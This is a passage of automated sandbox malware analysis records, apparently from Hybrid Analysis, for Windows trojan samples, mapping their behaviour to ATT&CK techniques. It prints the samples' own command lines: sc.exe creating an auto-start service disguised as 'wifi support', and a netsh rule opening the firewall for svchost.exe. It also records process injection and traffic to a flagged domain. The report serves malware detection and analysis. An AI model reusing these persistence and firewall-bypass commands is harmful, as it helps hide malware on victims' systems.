\"221b70\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"523284\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002232)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"qhdkbaei.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\NJRBICEI\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qhdkbaei.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qhdkbaei.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"qhdkbaei.exe.67EE4A76.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"qhdkbaei.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\qhdkbaei.exe]- [targetUID: 00000000-00005876]\n \"DISMHOST.EXE.67EE4FD0.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has section name .text with entropy \"6.630102803682182\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has section name .text with entropy \"7.972855291312212\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has section name .reloc with entropy \"6.221513865254286\"\n \"qhdkbaei.exe\" has section name .text with entropy \"6.630102803682182\"\n \"qhdkbaei.exe\" has section name .text with entropy \"7.972855291312212\"\n \"qhdkbaei.exe\" has section name .reloc with entropy \"6.221496050028631\"\n \"DISMHOST.EXE.67EE4FD0.bin\" has section name .text with entropy \"6.114767813379059\"\n \"DISMHOST.EXE.67EE4FD0.bin\" has section name .data with entropy \"6.4458000319803865\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005876)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (UID: 00000000-00005876)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00005848)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\qhdkbaei.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00006124)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\qhdkbaei.exe /d\\\\\"C:\\\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00004152)\n Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00006136)\n Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00004192)\n Spawned process \"qhdkbaei.exe\" with commandline \"/d\"C:\\\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\"\" (UID: 00000000-00003436)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002232)\n Spawned process \"svchost.exe\" (UID: 00000000-00002564)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 284)\n \"qhdkbaei.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"qhdkbaei.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"qhdkbaei.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"qhdkbaei.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"qhdkbaei.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00003436)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"qhdkbaei.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00004192)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002232)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7
https://hybrid-analysis.com/sample/eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7
Hybrid Analysis - Um_unhooking
{"size": 15494777, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7", "sha256": "eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 5, "total_processes": 9, "total_signatures": 237, "extracted_files": [{"name": "npkqjwg.exe", "file_path": "%TEMP%\\npkqjwg.exe", "file_size": 5242368, "sha256": "054df48ac3943ad1e828ecf09994c0b23fe5f11372ec53e0636476bd162d49c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe (PID: 4968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "npkqjwg.exe.67B73C01.bin", "file_size": 12856832, "sha256": "5280ac6e78e0267d15fe2470bc9d8f620c38895bbaa06b5329e050110b4df2f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "NPKQJWG.EXE.67B73C02.bin", "file_size": 12856832, "sha256": "5280ac6e78e0267d15fe2470bc9d8f620c38895bbaa06b5329e050110b4df2f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00004968", "name": "eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe", "normalized_path": "C:\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe", "sha256": "eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7", "av_label": "Trojan.BrsecmonE", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00000868", "parentuid": "00000000-00004968", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\jfnxeyae\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004296", "parentuid": "00000000-00004968", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\npkqjwg.exe\" %WINDIR%\\system32\\jfnxeyae\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00000348", "parentuid": "00000000-00004968", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create jfnxeyae binPath= \"%WINDIR%\\system32\\jfnxeyae\\npkqjwg.exe /d\\\"C:\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005132", "parentuid": "00000000-00004968", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description jfnxeyae \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00001952", "parentuid": "00000000-00004968", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start jfnxeyae", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005100", "parentuid": "00000000-00004968", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00001776", "name": "npkqjwg.exe", "normalized_path": "%WINDIR%\\system32\\jfnxeyae\\npkqjwg.exe", "command_line": "/d\"C:\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\"", "sha256": "5280ac6e78e0267d15fe2470bc9d8f620c38895bbaa06b5329e050110b4df2f5"}, {"uid": "00000000-00005656", "parentuid": "00000000-00001776", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": 